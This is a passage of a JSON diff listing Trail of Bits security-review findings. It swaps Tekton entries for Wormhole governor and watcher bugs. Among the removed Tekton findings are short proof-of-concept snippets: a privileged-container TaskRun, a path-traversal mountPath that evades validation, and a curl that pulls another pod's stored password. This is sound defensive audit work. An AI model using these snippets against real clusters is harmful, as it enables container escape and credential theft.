A developer adding functionality to the governor is unlikely to know whether the mutex must be locked for their application. The ChainGovernor struct appears in figure 2.1. The Wormhole Foundation communicated to us privately that the mutex protects the fields highlighted in yellow. Note that, because there are 13 fields in ChainGovernor (not counting the mutex itself), the likelihood of a developer guessing exactly the set of highlighted fields is small. type ChainGovernor struct { db db.GovernorDB; logger *zap.Logger; mutex sync.Mutex; tokens map[tokenKey]*tokenEntry; tokensByCoinGeckoId map[string][]*tokenEntry; chains map[vaa.ChainID]*chainEntry; msgsSeen map[string]bool /* Key is hash, payload is consts transferComplete and transferEnqueued. */; msgsToPublish []*common.MessagePublication; dayLengthInMinutes int; coinGeckoQuery string; env int; nextStatusPublishTime time.Time; nextConfigPublishTime time.Time; statusPublishCounter int64; configPublishCounter int64 } Figure 2.1: node/pkg/governor/governor.go#L119-L135 Exploit Scenario Alice, a Wormhole developer, adds a new function to the governor. Case 1: Alice does not lock the mutex, believing that her function operates only on fields that are not protected by the mutex. However, by not locking the mutex, Alice introduces a race condition into the governor. Case 2: Alice locks the mutex just to be safe. However, the fields on which Alice's function operates are not protected by the mutex. Alice introduces a deadlock into the code as a result. Recommendations Short term, document the fields within ChainGovernor that are protected by the mutex. This will reduce the likelihood that a developer incorrectly locks, or does not lock, the mutex. Long term, regularly review code comments to ensure they are accurate. Documentation must be kept up to date to be beneficial.", "labels": [ "Trail of Bits", - "Severity: High", - "Difficulty: Medium" + "Severity: Informational", + "Difficulty: High" ] }, { - "title": "8. Tekton allows users to create privileged containers ", - "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/Tekton.pdf", - "body": "Tekton allows users to define task and sidecar objects with a privileged security context, which effectively grants task containers all capabilities. Tekton operators can use admission controllers to disallow users from using this option. However, information on this mitigation in the guidance documents for Tekton Pipelines is insufficient and should be made clear. If an attacker gains code execution on any of these containers, the attacker could break out of it and gain full access to the host machine. We were not able to escape step containers running in privileged mode during the time allotted for this audit. apiVersion: tekton.dev/v1beta1 kind: TaskRun metadata: name: build-push-secret-10 spec: serviceAccountName: build-bot taskSpec: steps: - name: secret securityContext: privileged: true image: ubuntu script: | #!/usr/bin/env bash sleep 20m Figure 8.1: TaskRun definition with the privileged security context root@build-push-secret-10-pod:/proc/fs# find -type f -maxdepth 5 -writable find: warning: you have specified the global option -maxdepth after the argument -type, but global options are not positional, i.e., -maxdepth affects tests specified before it as well as those specified after it. Please specify global options before other arguments. 
./xfs/xqm ./xfs/xqmstat ./cifs/Stats ./cifs/cifsFYI ./cifs/dfscache ./cifs/traceSMB ./cifs/DebugData ./cifs/open_files ./cifs/SecurityFlags ./cifs/LookupCacheEnabled ./cifs/LinuxExtensionsEnabled ./ext4/vda1/fc_info ./ext4/vda1/options ./ext4/vda1/mb_groups ./ext4/vda1/es_shrinker_info ./jbd2/vda1-8/info ./fscache/stats Figure 8.2: With the privileged security context in figure 8.1, it is now possible to write to several files in /proc/fs, for example. Exploit Scenario A malicious developer runs a TaskRun with a privileged security context and obtains shell access to the container. Using one of various known exploits, he breaks out of the container and gains root access on the host. Recommendations Short term, create clear, easy-to-locate documentation warning operators about allowing developers and other users to define a privileged security context for step containers, and include guidance on how to restrict such a feature. 9. Insufficient default network access controls between pods Severity: Medium Difficulty: High Type: Configuration Finding ID: TOB-TKN-9 Target: Pipelines", + "title": "3. Potential nil pointer dereference in reloadPendingTransfer ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2023-03-wormhole-securityreview.pdf", + "body": "A potential nil pointer dereference exists in reloadPendingTransfer. The bug could be triggered if invalid data were stored within a node's database, and could make it impossible to restart the node. The relevant code appears in figures 3.1 and 3.2. When DecodeTransferPayloadHdr returns an error, the payload that is also returned is used to construct the error message (figure 3.1). However, as shown in figure 3.2, the returned payload can be nil. payload, err := vaa.DecodeTransferPayloadHdr(msg.Payload) if err != nil { gov.logger.Error(\"cgov: failed to parse payload for reloaded pending transfer, dropping it\", zap.String(\"MsgID\", msg.MessageIDString()), zap.Stringer(\"TxHash\", msg.TxHash), zap.Stringer(\"Timestamp\", msg.Timestamp), zap.Uint32(\"Nonce\", msg.Nonce), zap.Uint64(\"Sequence\", msg.Sequence), zap.Uint8(\"ConsistencyLevel\", msg.ConsistencyLevel), zap.Stringer(\"EmitterChain\", msg.EmitterChain), zap.Stringer(\"EmitterAddress\", msg.EmitterAddress), zap.Stringer(\"tokenChain\", payload.OriginChain), zap.Stringer(\"tokenAddress\", payload.OriginAddress), zap.Error(err), ) return } Figure 3.1: node/pkg/governor/governor_db.go#L90-L106 func DecodeTransferPayloadHdr(payload []byte) (*TransferPayloadHdr, error) { if !IsTransfer(payload) { return nil, fmt.Errorf(\"unsupported payload type\") } Figure 3.2: sdk/vaa/structs.go#L962-L965 Exploit Scenario Eve finds a code path that allows her to store erroneous payloads within the database of Alice's node. Alice is unable to restart her node, as it tries to dereference a nil pointer on each attempt. Recommendations Short term, either eliminate the use of payload when constructing the error message, or verify that the payload is not nil before attempting to dereference it. This will eliminate a potential nil pointer dereference. Long term, add tests to exercise additional error paths within governor_db.go. This could help to expose bugs like this one.", "labels": [ "Trail of Bits", - "Severity: Medium", - "Difficulty: Medium" + "Severity: Low", + "Difficulty: High" ] }, { - "title": "11. 
Lack of rate-limiting controls ", - "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/Tekton.pdf", - "body": "Tekton Dashboard does not enforce rate limiting of HTTP requests. As a result, we were able to issue over a thousand requests in just over a minute. Figure 11.1: We sent over a thousand requests to Tekton Dashboard without being rate limited. Processing requests sent at such a high rate can consume an inordinate amount of resources, increasing the risk of denial-of-service attacks through excessive resource consumption. In particular, we were able to create hundreds of running import resources pods that were able to consume nearly all the host's memory in the span of a minute. Exploit Scenario An attacker floods a Tekton Dashboard instance with HTTP requests that execute pipelines, leading to a denial-of-service condition. Recommendations Short term, implement rate limiting on all API endpoints. Long term, run stress tests to ensure that the rate limiting enforced by Tekton Dashboard is robust.", + "title": "4. Unchecked type assertion in queryCoinGecko ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2023-03-wormhole-securityreview.pdf", + "body": "The code that processes CoinGecko responses contains an unchecked type assertion. The bug is triggered when CoinGecko returns invalid data, and could be exploited for denial of service (DoS). The relevant code appears in figure 4.1. The data object that is returned as part of CoinGecko's response to a query is cast to a map m of type map[string]interface{} (yellow). However, the cast's success is not verified. As a result, a nil pointer dereference can occur when m is accessed (red). m := data.(map[string]interface{}) if len(m) != 0 { var ok bool price, ok = m[\"usd\"].(float64) if !ok { gov.logger.Error(\"cgov: failed to parse coin gecko response, reverting to configured price for this token\", zap.String(\"coinGeckoId\", coinGeckoId)) // By continuing, we leave this one in the local map so the price will get reverted below. continue } } Figure 4.1: node/pkg/governor/governor_prices.go#L144-L153 Note that if the access to m is successful, the resulting value is cast to a float64. In this case, the cast's success is verified. A similar check should be performed for the earlier cast. Exploit Scenario Eve, a malicious insider at CoinGecko, sends invalid data to Wormhole nodes, causing them to crash. Recommendations Short term, in the code in figure 4.1, verify that the cast in yellow is successful by adding a check similar to the one highlighted in green. This will eliminate the possibility of a node crashing because CoinGecko returns invalid data. Long term, consider enabling the forcetypeassert lint in CI. This bug was initially flagged by that lint, and then confirmed by our queryCoinGecko response fuzzer. Enabling the lint could help to expose additional bugs like this one.", "labels": [ "Trail of Bits", - "Severity: Low", - "Difficulty: Medium" + "Severity: Low", + "Difficulty: High" ] }, { - "title": "12. Lack of maximum request and response body constraint ", - "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/Tekton.pdf", - "body": "The ioutil.ReadAll function reads from source until an error or an end-of-file (EOF) condition occurs, at which point it returns the data that it read. This function is used in different files of the Tekton Triggers and Tekton Pipelines codebases to read requests and responses. 
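For contrast, the bounded-read pattern that the recommendations at the end of this finding point to might look like the following sketch; the 1 MiB cap and handler shape are assumed values, not taken from Tekton.

package main

import (
	"io"
	"net/http"
)

// maxBody is an assumed cap; a real deployment would choose its own limit.
const maxBody = 1 << 20 // 1 MiB

func handler(w http.ResponseWriter, r *http.Request) {
	// Read at most maxBody+1 bytes so an oversized body is detectable
	// without ever buffering an unbounded payload in memory.
	body, err := io.ReadAll(io.LimitReader(r.Body, maxBody+1))
	if err != nil {
		http.Error(w, "read error", http.StatusBadRequest)
		return
	}
	if len(body) > maxBody {
		http.Error(w, "body too large", http.StatusRequestEntityTooLarge)
		return
	}
	_ = body // hand the bounded payload to the normal processing path
}

func main() {
	http.HandleFunc("/", handler)
	_ = http.ListenAndServe("127.0.0.1:8080", nil)
}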
There is no limit on the maximum size of request and response bodies, so using ioutil.ReadAll to parse requests and responses could cause a denial of service (due to insufficient memory). A denial of service could also occur if an exhaustive resource is loaded multiple times. This method is used in the following locations of the codebase (file, project): pkg/remote/oci/resolver.go:L211 (Pipelines); pkg/sink/sink.go:147,465 (Triggers); pkg/interceptors/webhook/webhook.go:77 (Triggers); pkg/interceptors/interceptors.go:176 (Triggers); pkg/sink/validate_payload.go:29 (Triggers); cmd/binding-eval/cmd/root.go:141 (Triggers); cmd/triggerrun/cmd/root.go:182 (Triggers) Recommendations Short term, place a limit on the maximum size of request and response bodies. For example, this limit can be implemented by using the io.LimitReader function. Long term, place limits on request and response bodies globally in other places within the application to prevent denial-of-service attacks.", + "title": "5. Governor relies on a single external source of truth for asset prices ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2023-03-wormhole-securityreview.pdf", + "body": "The governor relies on a single external source (CoinGecko) for asset prices, which could enable an attacker to transfer more than they would otherwise be allowed. The governor fetches an asset's price from CoinGecko, compares the price to a hard-coded default, and uses whichever is larger (figure 5.1). However, if an asset's price were to grow much larger than the hard-coded default, the hard-coded default would essentially be meaningless, and CoinGecko would become the sole source of truth for the price of that asset. Such a situation could be problematic, for example, if the asset's price were volatile and CoinGecko had trouble keeping up with the price changes. // We should use the max(coinGeckoPrice, configuredPrice) as our price for computing notional value. func (te tokenEntry) updatePrice() { if (te.coinGeckoPrice == nil) || (te.coinGeckoPrice.Cmp(te.cfgPrice) < 0) { te.price.Set(te.cfgPrice) } else { te.price.Set(te.coinGeckoPrice) } } Figure 5.1: node/pkg/governor/governor_prices.go#L205-L212 Exploit Scenario Eve obtains a large quantity of AliceCoin from a hack. AliceCoin's price is both highly volatile and much larger than what was hard-coded in the last Wormhole release. CoinGecko has trouble keeping up with the current price of AliceCoin. Eve identifies a point in time when the price that CoinGecko reports is low (but still higher than the hard-coded default). Eve uses the opportunity to move more of her maliciously obtained AliceCoin than Wormhole would allow if CoinGecko had reported the correct price. Recommendations Short term, monitor the price of assets supported by Wormhole. If the price of an asset increases substantially, consider issuing a release that takes into account the new price. This will help to avoid situations where CoinGecko becomes the sole source of truth of the price of an asset. Long term, incorporate additional price oracles besides CoinGecko. This will provide more robust protection than requiring a human to monitor prices and issue point releases.", "labels": [ "Trail of Bits", "Severity: Informational", "Difficulty: Low" ] }, { - "title": "3. 
Lack of access controls for Tekton Pipelines API ", - "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/Tekton.pdf", - "body": "The Tekton Pipelines extension uses an API to process requests for various tasks such as listing namespaces and creating TaskRuns. While Tekton provides documentation on enabling OAuth2 authentication, the API is unauthenticated by default. Should a Tekton operator expose the dashboard for other users to monitor their own deployments, every API method would be available to them, allowing them to perform tasks on namespaces that they do not have access to. Figure 3.1: Successful unauthenticated request Exploit Scenario An attacker discovers the endpoint exposing the Tekton Pipelines API and uses it to perform destructive tasks such as deleting PipelineRuns. Furthermore, the attacker can discover potentially sensitive information pertaining to deployments configured in Tekton. Recommendations Short term, add documentation on securing access to the API using Kubernetes security controls, including explicit documentation on the security implications of exposing access to the dashboard and, therefore, the API. Long term, add an access control mechanism for controlling who can access the API and limiting access to namespaces as needed and/or possible.", + "title": "6. Potential resource leak ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2023-03-wormhole-securityreview.pdf", + "body": "Calls to some Contexts' cancel functions are missing along certain code paths involving panics. If an attacker were able to exercise these code paths in rapid succession, they could exhaust system resources and cause a DoS. Within watcher.go, WithTimeout is essentially used in one of two ways, using the pattern shown in either figure 6.1 or 6.2. The pattern of figure 6.1 is problematic because cancel will not be called if a panic occurs in MessageEventsForTransaction. By comparison, cancel will be called if a panic occurs after the defer statement in figure 6.2. Note that if a panic occurred in either figure 6.1 or 6.2, RunWithScissors (figure 6.3) would prevent the program from terminating. timeout, cancel := context.WithTimeout(ctx, 5*time.Second) blockNumber, msgs, err := MessageEventsForTransaction(timeout, w.ethConn, w.contract, w.chainID, tx) cancel() Figure 6.1: node/pkg/watchers/evm/watcher.go#L395-L397 timeout, cancel := context.WithTimeout(ctx, 15*time.Second) defer cancel() Figure 6.2: node/pkg/watchers/evm/watcher.go#L186-L187 // Start a go routine with recovering from any panic by sending an error to a error channel func RunWithScissors(ctx context.Context, errC chan error, name string, runnable supervisor.Runnable) { ScissorsErrors.WithLabelValues(\"scissors\", name).Add(0) go func() { defer func() { if r := recover(); r != nil { switch x := r.(type) { case error: errC <- fmt.Errorf(\"%s: %w\", name, x) default: errC <- fmt.Errorf(\"%s: %v\", name, x) } ScissorsErrors.WithLabelValues(\"scissors\", name).Inc() } }() err := runnable(ctx) if err != nil { errC <- err } }() } Figure 6.3: node/pkg/common/scissors.go#L20-L41 Golang's official Context documentation states: The WithCancel, WithDeadline, and WithTimeout functions take a Context (the parent) and return a derived Context (the child) and a CancelFunc. Failing to call the CancelFunc leaks the child and its children until the parent is canceled or the timer fires. In light of the above guidance, it seems prudent to call the cancel function, even along panicking paths. 
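A minimal sketch of that pattern follows; processTx is a hypothetical stand-in for a callee like MessageEventsForTransaction.

package main

import (
	"context"
	"time"
)

// processTx stands in for a callee such as MessageEventsForTransaction.
func processTx(ctx context.Context) error {
	<-ctx.Done()
	return ctx.Err()
}

// fetchWithTimeout uses the defer-based pattern: cancel runs on normal
// return and during panic unwinding, so the derived Context never leaks.
func fetchWithTimeout(ctx context.Context) error {
	timeout, cancel := context.WithTimeout(ctx, 5*time.Second)
	defer cancel()
	return processTx(timeout)
}

func main() { _ = fetchWithTimeout(context.Background()) }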
Note that the problem described applies to three locations in watch.go: one involving a call to MessageEventsForTransaction (figure 6.1), one involving a call to TimeOfBlockByHash, and one involving a call to TransactionReceipt. Exploit Scenario Eve discovers a code path she can call in rapid succession, which induces a panic in the call to MessageEventsForTransaction (figure 6.1). Eve exploits this code path to crash Wormhole nodes. Recommendations Short term, use the defer cancel() pattern (figure 6.2) wherever WithTimeout is used. This will help to prevent DoS conditions. Long term, regard all code involving Contexts with heightened scrutiny. Contexts are frequently a source of resource leaks in Go programs, and deserve elevated attention. References Golang Context WithTimeout Example", "labels": [ "Trail of Bits", "Severity: Informational", "Difficulty: Medium" ] }, { - "title": "4. Insufficient validation of volumeMounts paths ", - "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/Tekton.pdf", - "body": "The Tekton Pipelines extension performs a number of validations against task steps whenever a task is submitted for Tekton to process. One such validation verifies that the path for a volume mount is not inside the /tekton directory. This directory is treated as a special directory by Tekton, as it is used for Tekton-specific functionality. However, the extension uses strings.HasPrefix to verify that MountPath does not contain the string /tekton/ without first sanitizing it. As a result, it is possible to create volume mounts inside /tekton by using path traversal strings such as /somedir/../tekton/newdir in the volumeMounts variable of a task step definition. for j, vm := range s.VolumeMounts { if strings.HasPrefix(vm.MountPath, \"/tekton/\") && !strings.HasPrefix(vm.MountPath, \"/tekton/home\") { errs = errs.Also(apis.ErrGeneric(fmt.Sprintf(\"volumeMount cannot be mounted under /tekton/ (volumeMount %q mounted at %q)\", vm.Name, vm.MountPath), \"mountPath\").ViaFieldIndex(\"volumeMounts\", j)) } if strings.HasPrefix(vm.Name, \"tekton-internal-\") { errs = errs.Also(apis.ErrGeneric(fmt.Sprintf(`volumeMount name %q cannot start with \"tekton-internal-\"`, vm.Name), \"name\").ViaFieldIndex(\"volumeMounts\", j)) } } Figure 4.1: pipeline/pkg/apis/pipeline/v1beta1/task_validation.go#L218-L226 The YAML file in the figure below was used to create a volume in the reserved /tekton directory. apiVersion: tekton.dev/v1beta1 kind: TaskRun metadata: name: vol-test spec: taskSpec: steps: - image: docker name: client workingDir: /workspace script: | #!/usr/bin/env sh sleep 15m volumeMounts: - mountPath: /certs/client/../../../tekton/mytest name: empty-path volumes: - name: empty-path emptyDir: {} Figure 4.2: Task run file used to create a volume mount inside an invalid location The figure below demonstrates that the previous file successfully created the mytest directory inside of the /tekton directory by using a path traversal string. $ kubectl exec -i -t vol-test -- /bin/sh Defaulted container \"step-client\" out of: step-client, place-tools (init), step-init (init), place-scripts (init) /workspace # cd /tekton/ /tekton # ls bin creds downward home scripts steps termination results run mytest Figure 4.3: Logging into the task pod container, we can now list the mytest directory inside of /tekton. 
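A sketch of the sanitization described in the recommendation below; isReservedMount is a hypothetical helper, and the /tekton/home carve-out present in the real check is omitted for brevity.

package main

import (
	"fmt"
	"path/filepath"
	"strings"
)

// isReservedMount canonicalizes the path before the prefix check, so a
// traversal string like "/certs/client/../../../tekton/mytest" is caught.
func isReservedMount(mountPath string) bool {
	clean := filepath.Clean("/" + mountPath) // collapses "." and ".." segments
	return clean == "/tekton" || strings.HasPrefix(clean, "/tekton/")
}

func main() {
	fmt.Println(isReservedMount("/certs/client/../../../tekton/mytest")) // true
	fmt.Println(isReservedMount("/workspace/data"))                      // false
}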
Recommendations Short term, modify the code so that it converts the mountPath string into a file path and uses a function such as filepath.Clean to sanitize and canonicalize it before validating it.",
+ "title": "7. PolygonConnector does not properly use channels ",
+ "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2023-03-wormhole-securityreview.pdf",
+ "body": "The Polygon connector does not read from the PollSubscription.quit channel, nor does it write to the PollSubscription.unsubDone channel. A caller who calls Unsubscribe on the PollSubscription could hang. A PollSubscription struct contains three channels: err, quit, and unsubDone (figure 7.1). Based on our understanding of the code, the entity that fulfills the subscription writes to the err and unsubDone channels, and reads from the quit channel. Conversely, the entity that consumes the subscription reads from the err and unsubDone channels, and writes to the quit channel.1 type PollSubscription struct { errOnce sync.Once err chan error quit chan error unsubDone chan struct{} } Figure 7.1: node/pkg/watchers/evm/connectors/common.go#L38–L43 More specifically, the consumer can call PollSubscription.Unsubscribe, which writes ErrUnsubscribed to the quit channel and waits for a message on the unsubDone channel (figure 7.2). func (sub *PollSubscription) Unsubscribe() { sub.errOnce.Do(func() { select { case sub.quit <- ErrUnsubscribed: <-sub.unsubDone case <-sub.unsubDone: } close(sub.err) }) } Figure 7.2: node/pkg/watchers/evm/connectors/common.go#L59–L68 1 If our understanding is correct, we recommend documenting these facts. However, the Polygon connector does not read from the quit channel, nor does it write to the unsubDone channel (figure 7.3). This is unlike BlockPollConnector (figure 7.4), for example. Thus, if a caller tries to call Unsubscribe on the Polygon connector PollSubscription, the caller may hang. select { case <-ctx.Done(): return nil case err := <-messageSub.Err(): sub.err <- err case checkpoint := <-messageC: if err := c.processCheckpoint(ctx, sink, checkpoint); err != nil { sub.err <- fmt.Errorf(\"failed to process checkpoint: %w\", err) } } Figure 7.3: node/pkg/watchers/evm/connectors/polygon.go#L120–L129 select { case <-ctx.Done(): blockSub.Unsubscribe() innerErrSub.Unsubscribe() return nil case <-sub.quit: blockSub.Unsubscribe() innerErrSub.Unsubscribe() sub.unsubDone <- struct{}{} return nil case v := <-innerErrSink: sub.err <- fmt.Errorf(v) } Figure 7.4: node/pkg/watchers/evm/connectors/poller.go#L180–L192 Exploit Scenario Alice, a Wormhole developer, adds a code path that involves calling Unsubscribe on a Polygon connector's PollSubscription. By doing so, Alice introduces a deadlock into the code. Recommendations Short term, adjust the code in figure 7.3 so that it reads from the quit channel and writes to the unsubDone channel, similar to how the code in figure 7.4 does. This will eliminate a class of code paths along which hangs or deadlocks could occur. Long term, consider refactoring the code so that the select statements in figures 7.3 and 7.4, as well as a similar statement in LogPollConnector, are consolidated under a single function. The three statements appear similar in their behavior; combining them would make the code more robust against future changes and could help to prevent bugs like this one.",
"labels": [
"Trail of Bits",
- "Severity: Informational",
- "Difficulty: Low"
+ "Severity: Undetermined",
+ "Difficulty: Undetermined"
]
},
{
- "title": "7. 
Insufficient security hardening of step containers ",
- "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/Tekton.pdf",
- "body": "Containers used for running task and pipeline steps have excessive security context options enabled. This increases the attack surface of the system, and issues such as Linux kernel bugs may allow attackers to escape a container if they gain code execution within a Tekton container. The figure below shows the security properties of a task container with the docker driver. # cat /proc/self/status | egrep 'Name|Uid|Gid|Groups|Cap|NoNewPrivs|Seccomp' Name: cat Uid: 0 0 0 0 Gid: 0 0 0 0 Groups: 0 CapInh: 00000000a80425fb CapPrm: 00000000a80425fb CapEff: 00000000a80425fb CapBnd: 00000000a80425fb CapAmb: 0000000000000000 NoNewPrivs: 0 Seccomp: 0 Seccomp_filters: 0 Figure 7.1: The security properties of one of the step containers Exploit Scenario Eve finds a bug that allows her to run arbitrary code on behalf of a confined process within a container, using it to gain more privileges in the container and then to attack the host. Recommendations Short term, drop default capabilities from containers and prevent processes from gaining additional privileges by setting the --cap-drop=ALL and --security-opt=no-new-privileges:true flags when starting containers. Long term, review and implement the Kubernetes security recommendations in appendix C.",
+ "title": "8. Receiver closes channel, contradicting Golang guidance ",
+ "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2023-03-wormhole-securityreview.pdf",
+ "body": "According to Golang's official guidance, \"Only the sender should close a channel, never the receiver. Sending on a closed channel will cause a panic.\" However, along some code paths within the watcher code, the receiver of a channel closes the channel. When PollSubscription.Unsubscribe is called, it closes the err channel (figure 8.1). However, in logpoller.go (figure 8.2), the caller of Unsubscribe (red) is clearly an err channel receiver (green). func (sub *PollSubscription) Err() <-chan error { return sub.err } func (sub *PollSubscription) Unsubscribe() { sub.errOnce.Do(func() { select { case sub.quit <- ErrUnsubscribed: <-sub.unsubDone case <-sub.unsubDone: } close(sub.err) }) } Figure 8.1: node/pkg/watchers/evm/connectors/common.go#L55–L68 sub, err := l.SubscribeForBlocks(ctx, errC, blockChan) if err != nil { return err } defer sub.Unsubscribe() supervisor.Signal(ctx, supervisor.SignalHealthy) for { select { case <-ctx.Done(): return ctx.Err() case err := <-sub.Err(): return err case err := <-errC: return err case block := <-blockChan: if err := l.processBlock(ctx, logger, block); err != nil { l.errFeed.Send(err.Error()) } } } Figure 8.2: node/pkg/watchers/evm/connectors/logpoller.go#L49–L69 Exploit Scenario Eve discovers a code path along which a sender tries to send to an already closed err channel and panics. RunWithScissors (see TOB-WORMGUWA-6) prevents the node from terminating, but the node is left in an undetermined state. Recommendations Short term, eliminate the call to close in figure 8.1. This will eliminate a class of code paths along which the err channel's sender(s) could panic. Long term, for each channel, document who the expected senders and receivers are. This will help catch bugs like this one. References A Tour of Go: Range and Close",
"labels": [
"Trail of Bits",
- "Severity: Low",
- "Difficulty: High"
+ "Severity: Undetermined",
+ "Difficulty: Undetermined"
]
},
{
- "title": "8. 
Tekton allows users to create privileged containers ",
- "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/Tekton.pdf",
- "body": "Tekton allows users to define task and sidecar objects with a privileged security context, which effectively grants task containers all capabilities. Tekton operators can use admission controllers to disallow users from using this option. However, information on this mitigation in the guidance documents for Tekton Pipelines is insufficient and should be made clear. If an attacker gains code execution on any of these containers, the attacker could break out of it and gain full access to the host machine. We were not able to escape step containers running in privileged mode during the time allotted for this audit. apiVersion: tekton.dev/v1beta1 kind: TaskRun metadata: name: build-push-secret-10 spec: serviceAccountName: build-bot taskSpec: steps: - name: secret securityContext: privileged: true image: ubuntu script: | #!/usr/bin/env bash sleep 20m Figure 8.1: TaskRun definition with the privileged security context root@build-push-secret-10-pod:/proc/fs# find -type f -maxdepth 5 -writable find: warning: you have specified the global option -maxdepth after the argument -type, but global options are not positional, i.e., -maxdepth affects tests specified before it as well as those specified after it. Please specify global options before other arguments. ./xfs/xqm ./xfs/xqmstat ./cifs/Stats ./cifs/cifsFYI ./cifs/dfscache ./cifs/traceSMB ./cifs/DebugData ./cifs/open_files ./cifs/SecurityFlags ./cifs/LookupCacheEnabled ./cifs/LinuxExtensionsEnabled ./ext4/vda1/fc_info ./ext4/vda1/options ./ext4/vda1/mb_groups ./ext4/vda1/es_shrinker_info ./jbd2/vda1-8/info ./fscache/stats Figure 8.2: With the privileged security context in figure 8.1, it is now possible to write to several files in /proc/fs, for example. Exploit Scenario A malicious developer runs a TaskRun with a privileged security context and obtains shell access to the container. Using one of various known exploits, he breaks out of the container and gains root access on the host. Recommendations Short term, create clear, easy-to-locate documentation warning operators about allowing developers and other users to define a privileged security context for step containers, and include guidance on how to restrict such a feature.",
+ "title": "9. Watcher configuration is overly complex ",
+ "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2023-03-wormhole-securityreview.pdf",
+ "body": "The Run function of the Watcher configures each chain's connection based on its fields, unsafeDevMode and chainID. This is done in a series of nested if-statements that span over 100 lines, amounting to a cyclomatic complexity over 90, which far exceeds what is considered complex. In order to make the code easier to understand, test, and maintain, it should be refactored. Rather than handling all of the business logic in a monolithic function, the logic for each chain should be isolated within a dedicated helper function. This would make the code easier to follow and reduce the likelihood that an update to one chain's configuration inadvertently introduces a bug for other chains. if w.chainID == vaa.ChainIDCelo && !w.unsafeDevMode { // When we are running in mainnet or testnet, we need to use the Celo ethereum library rather than go-ethereum. // However, in devnet, we currently run the standard ETH node for Celo, so we need to use the standard go-ethereum. 
w.ethConn, err = connectors.NewCeloConnector(timeout, w.networkName, w.url, w.contract, logger) if err != nil { ethConnectionErrors.WithLabelValues(w.networkName, \"dial_error\").Inc() p2p.DefaultRegistry.AddErrorCount(w.chainID, 1) return fmt.Errorf(\"dialing eth client failed: %w\", err) } } else if useFinalizedBlocks { if w.chainID == vaa.ChainIDEthereum && !w.unsafeDevMode { safeBlocksSupported = true logger.Info(\"using finalized blocks, will publish safe blocks\") } else { logger.Info(\"using finalized blocks\") } [...] /* many more nested branches */ Figure 9.1: node/pkg/watchers/evm/watcher.go#L192–L326 Exploit Scenario Alice, a Wormhole developer, introduces a bug that causes guardians to run in unsafe mode in production while adding support for a new evm chain, due to the difficulty of modifying and testing the nested code. Recommendations Short term, isolate each chain's configuration into a helper function and document how the configurations were determined. Long term, run linters in CI to identify code with high cyclomatic complexity, and consider whether complex code can be simplified during code reviews.",
"labels": [
"Trail of Bits",
- "Severity: Medium",
+ "Severity: Informational",
"Difficulty: Medium"
]
},
{
- "title": "9. Insufficient default network access controls between pods ",
- "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/Tekton.pdf",
- "body": "By default, containers deployed as part of task steps do not have any egress or ingress network restrictions. As a result, containers could reach services exposed over the network from any task step container. For instance, in figure 9.2, a user logs into a container running a task step in the developer-group namespace and successfully makes a request to a service in a step container in the qa-group namespace. root@build-push-secret-35-pod:/# ifconfig eth0: flags=4163 mtu 1500 inet 172.17.0.17 netmask 255.255.0.0 broadcast 172.17.255.255 ether 02:42:ac:11:00:11 txqueuelen 0 (Ethernet) RX packets 21831 bytes 32563599 (32.5 MB) RX errors 0 dropped 0 overruns 0 frame 0 TX packets 6465 bytes 362926 (362.9 KB) TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0 lo: flags=73 mtu 65536 inet 127.0.0.1 netmask 255.0.0.0 loop txqueuelen 1000 (Local Loopback) RX packets 0 bytes 0 (0.0 B) RX errors 0 dropped 0 overruns 0 frame 0 TX packets 0 bytes 0 (0.0 B) TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0 root@build-push-secret-35-pod:/# python -m SimpleHTTPServer Serving HTTP on 0.0.0.0 port 8000 ... 172.17.0.16 - - [08/Mar/2022 01:03:50] \"GET /tekton/creds-secrets/basic-user-pass-canary/password HTTP/1.1\" 200 - 172.17.0.16 - - [08/Mar/2022 01:04:05] \"GET /tekton/creds-secrets/basic-user-pass-canary/password HTTP/1.1\" 200 - Figure 9.1: Exposing a simple server in a step container in the developer-group namespace root@build-push-secret-35-pod:/# curl 172.17.0.17:8000/tekton/creds-secrets/basic-user-pass-canary/password mySUPERsecretPassword Figure 9.2: Reaching the service exposed in figure 9.1 from another container in the qa-group namespace Exploit Scenario An attacker launches a malicious task container that reaches a service exposed via a sidecar container and performs unauthorized actions against the service. Recommendations Short term, enforce ingress and egress restrictions to allow only resources that need to speak to each other to do so. Leverage allowlists instead of denylists to ensure that only expected components can establish these connections. 
Long term, ensure the use of appropriate methods of isolation to prevent lateral movement. 10. \"Import resources\" feature does not validate repository path Severity: Informational Difficulty: Low Type: Data Validation Finding ID: TOB-TKN-10 Target: Dashboard",
+ "title": "10. evm.Watcher.Run's default behavior could hide bugs ",
+ "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2023-03-wormhole-securityreview.pdf",
